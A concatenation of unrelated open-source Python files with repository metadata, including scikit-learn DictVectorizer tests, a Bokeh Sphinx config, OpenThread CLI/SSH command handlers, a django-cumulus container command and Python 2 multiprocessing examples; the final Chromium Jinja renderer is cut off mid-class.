assert str(error.value) == error_value
def test_unseen_or_no_features():
D = [{"camelot": 0, "spamalot": 1}]
for sparse in [True, False]:
v = DictVectorizer(sparse=sparse).fit(D)
X = v.transform({"push the pram a lot": 2})
if sparse:
X = X.toarray()
assert_array_equal(X, np.zeros((1, 2)))
X = v.transform({})
if sparse:
X = X.toarray()
assert_array_equal(X, np.zeros((1, 2)))
try:
v.transform([])
except ValueError as e:
assert "empty" in str(e)
def test_deterministic_vocabulary():
# Generate equal dictionaries with different memory layouts
items = [("%03d" % i, i) for i in range(1000)]
rng = Random(42)
d_sorted = dict(items)
rng.shuffle(items)
d_shuffled = dict(items)
# check that the memory layout does not impact the resulting vocabulary
v_1 = DictVectorizer().fit([d_sorted])
v_2 = DictVectorizer().fit([d_shuffled])
assert v_1.vocabulary_ == v_2.vocabulary_
def test_n_features_in():
# For vectorizers, n_features_in_ does not make sense and does not exist.
dv = DictVectorizer()
assert not hasattr(dv, "n_features_in_")
d = [{"foo": 1, "bar": 2}, {"foo": 3, "baz": 1}]
dv.fit(d)
assert not hasattr(dv, "n_features_in_")
def test_dictvectorizer_dense_sparse_equivalence():
"""Check the equivalence between between sparse and dense DictVectorizer.
Non-regression test for:
https://github.com/scikit-learn/scikit-learn/issues/19978
"""
movie_entry_fit = [
{"category": ["thriller", "drama"], "year": 2003},
{"category": ["animation", "family"], "year": 2011},
{"year": 1974},
]
movie_entry_transform = [{"category": ["thriller"], "unseen_feature": "3"}]
dense_vectorizer = DictVectorizer(sparse=False)
sparse_vectorizer = DictVectorizer(sparse=True)
dense_vector_fit = dense_vectorizer.fit_transform(movie_entry_fit)
sparse_vector_fit = sparse_vectorizer.fit_transform(movie_entry_fit)
assert not sp.issparse(dense_vector_fit)
assert sp.issparse(sparse_vector_fit)
assert_allclose(dense_vector_fit, sparse_vector_fit.toarray())
dense_vector_transform = dense_vectorizer.transform(movie_entry_transform)
sparse_vector_transform = sparse_vectorizer.transform(movie_entry_transform)
assert not sp.issparse(dense_vector_transform)
assert sp.issparse(sparse_vector_transform)
assert_allclose(dense_vector_transform, sparse_vector_transform.toarray())
dense_inverse_transform = dense_vectorizer.inverse_transform(dense_vector_transform)
sparse_inverse_transform = sparse_vectorizer.inverse_transform(
sparse_vector_transform
)
expected_inverse = [{"category=thriller": 1.0}]
assert dense_inverse_transform == expected_inverse
assert sparse_inverse_transform == expected_inverse
def test_dict_vectorizer_unsupported_value_type():
"""Check that we raise an error when the value associated to a feature
is not supported.
Non-regression test for:
https://github.com/scikit-learn/scikit-learn/issues/19489
"""
class A:
pass
vectorizer = DictVectorizer(sparse=True)
X = [{"foo": A()}]
err_msg = "Unsupported value Type"
with pytest.raises(TypeError, match=err_msg):
vectorizer.fit_transform(X)
|
huzq/scikit-learn
|
sklearn/feature_extraction/tests/test_dict_vectorizer.py
|
Python
|
bsd-3-clause
| 7,189
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from os.path import abspath, dirname, join
#
# Bokeh documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 12 23:43:03 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.7'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.ifconfig',
'sphinx.ext.napoleon',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'bokeh.sphinxext.bokeh_autodoc',
'bokeh.sphinxext.bokeh_color',
'bokeh.sphinxext.bokeh_enum',
'bokeh.sphinxext.bokeh_gallery',
'bokeh.sphinxext.bokeh_github',
'bokeh.sphinxext.bokeh_jinja',
'bokeh.sphinxext.bokeh_model',
'bokeh.sphinxext.bokeh_options',
'bokeh.sphinxext.bokeh_palette',
'bokeh.sphinxext.bokeh_palette_group',
'bokeh.sphinxext.bokeh_plot',
'bokeh.sphinxext.bokeh_prop',
'bokeh.sphinxext.bokeh_releases',
'bokeh.sphinxext.bokeh_sitemap',
'bokeh.sphinxext.collapsible_code_block',
]
napoleon_include_init_with_doc = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Bokeh'
copyright = '© Copyright 2015-2018, Anaconda and Bokeh Contributors.'
# Get the standard computed Bokeh version string to use for |version|
# and |release|
from bokeh import __version__
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# Check for version override (e.g. when re-deploying a previously released
# docs, or when pushing test docs that do not have a corresponding BokehJS
# available on CDN)
from bokeh.settings import settings
if settings.docs_version():
version = release = settings.docs_version()
# get all the versions that will appear in the version dropdown
f = open(join(dirname(abspath(__file__)), "all_versions.txt"))
all_versions = [x.strip() for x in reversed(f.readlines())]
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
#
# NOTE: in these docs all .py script are assumed to be bokeh plot scripts!
# with bokeh_plot_pyfile_include_dirs set desired folder to look for .py files
bokeh_plot_pyfile_include_dirs = ['docs']
# Whether to allow builds to succeed if a Google API key is not defined and plots
# containing "GOOGLE_API_KEY" are processed
bokeh_missing_google_api_key_ok = False
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# Sort members by type
autodoc_member_order = 'groupwise'
# patterns to exclude
exclude_patterns = ['docs/releases/*']
# This would more properly be done with rst_epilog but something about
# the combination of this with the bokeh-gallery directive breaks the build
rst_prolog = """
.. |Color| replace:: :py:class:`~bokeh.core.properties.Color`
.. |DataSpec| replace:: :py:class:`~bokeh.core.properties.DataSpec`
.. |Document| replace:: :py:class:`~bokeh.document.Document`
.. |HasProps| replace:: :py:class:`~bokeh.core.has_props.HasProps`
.. |Model| replace:: :py:class:`~bokeh.model.Model`
.. |Property| replace:: :py:class:`~bokeh.core.property.bases.Property`
.. |PropertyDescriptor| replace:: :py:class:`~bokeh.core.property.descriptor.PropertyDescriptor`
.. |PropertyContainer| replace:: :py:class:`~bokeh.core.property.wrappers.PropertyContainer`
.. |UnitsSpec| replace:: :py:class:`~bokeh.core.properties.UnitsSpec`
.. |field| replace:: :py:func:`~bokeh.core.properties.field`
.. |value| replace:: :py:func:`~bokeh.core.properties.value`
"""
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bokeh_theme'
html_theme_path = ['.']
html_context = {
'SITEMAP_BASE_URL': 'https://bokeh.pydata.org/en/', # Trailing slash is needed
'DESCRIPTION': 'Bokeh visualization library, documentation site.',
'AUTHOR': 'Bokeh contributors',
'VERSION': version,
'NAV': (
('Github', '//github.com/bokeh/bokeh'),
),
'ABOUT': (
('Vision and Work', 'vision'),
('Team', 'team'),
('Citation', 'citation'),
('Contact', 'contact'),
),
'SOCIAL': (
('Contribute', 'contribute'),
('Mailing list', '//groups.google.com/a/anaconda.com/forum/#!forum/bokeh'),
('Github', '//github.com/bokeh/bokeh'),
('Twitter', '//twitter.com/BokehPlots'),
),
'NAV_DOCS': (
('Installation', 'installation'),
('User Guide', 'user_guide'),
('Gallery', 'gallery'),
('Tutorial', 'https://mybinder.org/v2/gh/bokeh/bokeh-notebooks/master?filepath=tutorial%2F00%20-%20Introduction%20and%20Setup.ipynb'),
('Reference', 'reference'),
('Releases', 'releases'),
('Developer Guide', 'dev_guide'),
),
'ALL_VERSIONS': all_versions,
}
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
# Output file base name for HTML help builder.
htmlhelp_basename = 'Bokehdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Bokeh.tex', u'Bokeh Documentation', u'Anaconda', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bokeh', u'Bokeh Documentation',
[u'Anaconda'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Bokeh', u'Bokeh Documentation', u'Anaconda', 'Bokeh', 'Interactive Web Plotting for Python', 'Graphics'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# intersphinx settings
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'pandas': ('http://pandas.pydata.org/pandas-docs/stable/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None)
}
|
mindriot101/bokeh
|
sphinx/source/conf.py
|
Python
|
bsd-3-clause
| 9,540
|
from __future__ import print_function
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem.PyMol import MolViewer
from rdkit.Chem.Subshape import SubshapeBuilder,SubshapeObjects,SubshapeAligner
from rdkit.six.moves import cPickle
import copy
m1 = Chem.MolFromMolFile('test_data/square1.mol')
m2 = Chem.MolFromMolFile('test_data/square2.mol')
b = SubshapeBuilder.SubshapeBuilder()
b.gridDims=(10.,10.,5)
b.gridSpacing=0.4
b.winRad=2.0
if 1:
print('m1:')
s1 = b.GenerateSubshapeShape(m1)
cPickle.dump(s1,file('test_data/square1.shp.pkl','wb+'))
print('m2:')
s2 = b.GenerateSubshapeShape(m2)
cPickle.dump(s2,file('test_data/square2.shp.pkl','wb+'))
ns1 = b.CombineSubshapes(s1,s2)
b.GenerateSubshapeSkeleton(ns1)
cPickle.dump(ns1,file('test_data/combined.shp.pkl','wb+'))
else:
s1 = cPickle.load(file('test_data/square1.shp.pkl','rb'))
s2 = cPickle.load(file('test_data/square2.shp.pkl','rb'))
#ns1 = cPickle.load(file('test_data/combined.shp.pkl','rb'))
ns1=cPickle.load(file('test_data/combined.shp.pkl','rb'))
v = MolViewer()
SubshapeObjects.DisplaySubshape(v,s1,'shape1')
SubshapeObjects.DisplaySubshape(v,ns1,'ns1')
#SubshapeObjects.DisplaySubshape(v,s2,'shape2')
a = SubshapeAligner.SubshapeAligner()
pruneStats={}
algs =a.GetSubshapeAlignments(None,ns1,m1,s1,b,pruneStats=pruneStats)
print(len(algs))
print(pruneStats)
import os,tempfile
from rdkit import Geometry
fName = tempfile.mktemp('.grd')
Geometry.WriteGridToFile(ns1.coarseGrid.grid,fName)
v.server.loadSurface(fName,'coarse','',2.5)
os.unlink(fName)
fName = tempfile.mktemp('.grd')
Geometry.WriteGridToFile(ns1.medGrid.grid,fName)
v.server.loadSurface(fName,'med','',2.5)
os.unlink(fName)
|
soerendip42/rdkit
|
rdkit/Chem/Subshape/testCombined.py
|
Python
|
bsd-3-clause
| 1,702
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
assert not self.__should_close.is_set(), "OT CLI is already closed."
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
self.__otcli_reader.join()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.is_set():
try:
line = self.__otcli.readline()
except Exception:
if self.__should_close.is_set():
break
else:
raise
logging.debug('%s: %r', self.__otcli, line)
if line is None:
break
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
|
jwhui/openthread
|
tools/otci/otci/command_handlers.py
|
Python
|
bsd-3-clause
| 9,542
|
#
# stage.py -- Classes for pipeline stages
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.misc import Bunch
#__all__ = ['Pipeline']
class StageError(Exception):
pass
class Stage(object):
"""Class to handle a pipeline stage."""
_stagename = 'generic'
def __init__(self):
super(Stage, self).__init__()
# default name, until user changes it
self.name = str(self)
# for holding widgets
self.w = Bunch.Bunch()
self._bypass = False
# these get assigned by the owning pipeline
self.pipeline = None
self.logger = None
self.result = None
self.gui_up = False
def build_gui(self, container):
"""subclass can override this to build some kind of GUI."""
pass
def start(self):
"""subclass can override this to do any necessary setup."""
pass
def stop(self):
"""subclass can override this to do any necessary teardown."""
pass
def pause(self):
"""subclass can override this to do any necessary teardown."""
pass
def resume(self):
"""subclass can override this to do any necessary teardown."""
pass
def invalidate(self):
"""subclass can override this to do any necessary invalidation."""
pass
def bypass(self, tf):
self._bypass = tf
def verify_2d(self, data):
if data is not None and len(data.shape) < 2:
raise StageError("Expecting a 2D or greater array in final stage")
def export_as_dict(self):
d = dict(name=self.name, type=self._stagename, bypass=self._bypass)
return d
def import_from_dict(self, d):
self.name = d['name']
self._bypass = d['bypass']
def __str__(self):
return self._stagename
|
pllim/ginga
|
ginga/util/stages/base.py
|
Python
|
bsd-3-clause
| 1,889
|
import optparse
import pyrax
import swiftclient
from django.core.management.base import BaseCommand, CommandError
from cumulus.settings import CUMULUS
def cdn_enabled_for_container(container):
"""pyrax.cf_wrapper.CFClient assumes cdn_connection.
Currently the pyrax swift client wrapper assumes that if
you're using pyrax, you're using the CDN support that's
only available with the rackspace openstack.
This can be removed once the following pull-request lands
(or is otherwise resolved):
https://github.com/rackspace/pyrax/pull/254
"""
try:
return container.cdn_enabled
except AttributeError:
return False
class Command(BaseCommand):
help = "Create a container."
args = "[container_name]"
option_list = BaseCommand.option_list + (
optparse.make_option("-p", "--private", action="store_true", default=False,
dest="private", help="Make a private container."),)
def connect(self):
"""
Connects using the swiftclient api.
"""
self.conn = swiftclient.Connection(authurl=CUMULUS["AUTH_URL"],
user=CUMULUS["USERNAME"],
key=CUMULUS["API_KEY"],
snet=CUMULUS["SERVICENET"],
auth_version=CUMULUS["AUTH_VERSION"],
tenant_name=CUMULUS["AUTH_TENANT_NAME"])
def handle(self, *args, **options):
if len(args) != 1:
raise CommandError("Pass one and only one [container_name] as an argument")
self.connect()
container_name = args[0]
print("Creating container: {0}".format(container_name))
self.conn.put_container(container_name)
if not options.get("private"):
print("Publish container: {0}".format(container_name))
headers = {"X-Container-Read": ".r:*"}
self.conn.post_container(container_name, headers=headers)
if CUMULUS["USE_PYRAX"]:
if CUMULUS["PYRAX_IDENTITY_TYPE"]:
pyrax.set_setting("identity_type", CUMULUS["PYRAX_IDENTITY_TYPE"])
pyrax.set_credentials(CUMULUS["USERNAME"], CUMULUS["API_KEY"])
public = not CUMULUS["SERVICENET"]
connection = pyrax.connect_to_cloudfiles(region=CUMULUS["REGION"],
public=public)
container = connection.get_container(container_name)
if cdn_enabled_for_container(container):
container.make_public(ttl=CUMULUS["TTL"])
|
absoludity/django-cumulus
|
cumulus/management/commands/container_create.py
|
Python
|
bsd-3-clause
| 2,713
|
#!/usr/bin/python
#
# This file is part of CONCUSS, https://github.com/theoryinpractice/concuss/,
# and is Copyright (C) North Carolina State University, 2015. It is licensed
# under the three-clause BSD license; see LICENSE.
#
from lib.util.memorized import memorized
from lib.graph.graph import Graph
# Calculate one transitive-fraternal-augmentation-step and
# result a tuple (newgraph, transedges, fratedges)
@memorized(['orig', 'step'])
def trans_frater_augmentation(orig, g, trans, frat, col,
nodes, step, td, ldoFunc):
fratGraph = Graph()
newTrans = {}
for v in g:
for x, y, _, in g.trans_trips(v):
newTrans[(x, y)] = step
assert (not g.adjacent(x, y)), \
"{0} {1} transitive but adjacent".format(x, y)
for x, y, _ in g.frat_trips(v):
fratGraph.add_edge(x, y)
assert (not g.adjacent(x, y)), \
"{0} {1} fraternal but adjacent".format(x, y)
for (s, t) in newTrans.keys():
g.add_arc(s, t, 1)
fratGraph.remove_edge(s, t)
# TODO: support dict to see current in-degree...
fratDigraph = ldoFunc(fratGraph)
# calculate result
trans.update(newTrans)
for s, t, _ in fratDigraph.arcs():
frat[(s, t)] = step
g.add_arc(s, t, 1)
return (g, trans, frat)
# end def
|
nish10z/CONCUSS
|
lib/coloring/basic/trans_frater_augmentation.py
|
Python
|
bsd-3-clause
| 1,365
|
import numpy as np
import pytest
pytestmark = pytest.mark.gpu
import dask.array as da
from dask.array.gufunc import apply_gufunc
from dask.array.utils import assert_eq
cupy = pytest.importorskip("cupy")
def test_apply_gufunc_axis():
def mydiff(x):
return np.diff(x)
a = cupy.random.randn(3, 6, 4)
da_ = da.from_array(a, chunks=2, asarray=False)
m = np.diff(a, axis=1)
dm = apply_gufunc(
mydiff, "(i)->(i)", da_, axis=1, output_sizes={"i": 5}, allow_rechunk=True
)
assert_eq(m, dm)
|
dask/dask
|
dask/array/tests/test_cupy_gufunc.py
|
Python
|
bsd-3-clause
| 532
|
#
# A test file for the `processing` package
#
import time, sys, random
from Queue import Empty
import processing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print '\n\t\t\t' + str(processing.currentProcess()) + ' has finished'
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = processing.Value('i', TASKS)
mutex = processing.Lock()
for i in range(TASKS):
processing.Process(target=value_func, args=(running, mutex)).start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print running.value,
sys.stdout.flush()
mutex.release()
print
print 'No more running processes'
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = processing.Queue()
p = processing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print o,
sys.stdout.flush()
except Empty:
print 'TIMEOUT'
print
#### TEST_CONDITION
def condition_func(cond):
cond.acquire()
print '\t' + str(cond)
time.sleep(2)
print '\tchild is notifying'
print '\t' + str(cond)
cond.notify()
cond.release()
def test_condition():
cond = processing.Condition()
p = processing.Process(target=condition_func, args=(cond,))
print cond
cond.acquire()
print cond
cond.acquire()
print cond
p.start()
print 'main is waiting'
cond.wait()
print 'main has woken up'
print cond
cond.release()
print cond
cond.release()
p.join()
print cond
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print running.value, 'tasks are running'
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print '%s has finished' % processing.currentProcess()
mutex.release()
sema.release()
def test_semaphore():
sema = processing.Semaphore(3)
mutex = processing.RLock()
running = processing.Value('i', 0)
processes = [
processing.Process(target=semaphore_func, args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print '\tchild sleeping'
time.sleep(5.5)
print '\n\tchild terminating'
def test_join_timeout():
p = processing.Process(target=join_timeout_func)
p.start()
print 'waiting for process to finish'
while 1:
p.join(timeout=1)
if not p.isAlive():
break
print '.',
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print '\t%r is waiting' % processing.currentProcess()
event.wait()
print '\t%r has woken up' % processing.currentProcess()
def test_event():
event = processing.Event()
processes = [processing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print 'main is sleeping'
time.sleep(2)
print 'main is setting event'
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print 'Tests passed'
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', range(100)),
('d', [0.25 * i for i in range(100)]),
('H', range(1000))
]
shared_values = [processing.Value(id, v) for id, v in values]
shared_arrays = [processing.Array(id, a) for id, a in arrays]
p = processing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.getExitCode() == 0
####
def test(namespace=processing):
global processing
processing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print '\n\t######## %s\n' % func.__name__
func()
ignore = processing.activeChildren() # cleanup any old processes
if hasattr(processing, '_debugInfo'):
info = processing._debugInfo()
if info:
print info
raise ValueError, 'there should be no positive refcounts left'
if __name__ == '__main__':
processing.freezeSupport()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print ' Using processes '.center(79, '-')
namespace = processing
elif sys.argv[1] == 'manager':
print ' Using processes and a manager '.center(79, '-')
namespace = processing.Manager()
namespace.Process = processing.Process
namespace.currentProcess = processing.currentProcess
namespace.activeChildren = processing.activeChildren
elif sys.argv[1] == 'threads':
print ' Using threads '.center(79, '-')
import processing.dummy as namespace
else:
print 'Usage:\n\t%s [processes | manager | threads]' % sys.argv[0]
raise SystemExit, 2
test(namespace)
|
seishei/multiprocess
|
py2.5/examples/ex_synchronize.py
|
Python
|
bsd-3-clause
| 6,159
|
#!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Renders one or more template files using the Jinja template engine."""
import codecs
import argparse
import os
import sys
from util import build_utils
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from pylib.constants import host_paths
# Import jinja2 from third_party/jinja2
sys.path.append(os.path.join(host_paths.DIR_SOURCE_ROOT, 'third_party'))
import jinja2 # pylint: disable=F0401
class _RecordingFileSystemLoader(jinja2.FileSystemLoader):
def __init__(self, searchpath):
jinja2.FileSystemLoader.__init__(self, searchpath)
self.loaded_templates = set()
def get_source(self, environment, template):
contents, filename, uptodate = jinja2.FileSystemLoader.get_source(
self, environment, template)
self.loaded_templates.add(os.path.relpath(filename))
return contents, filename, uptodate
class JinjaProcessor(object):
"""Allows easy rendering of jinja templates with input file tracking."""
def __init__(self, loader_base_dir, variables=None):
self.loader_base_dir = loader_base_dir
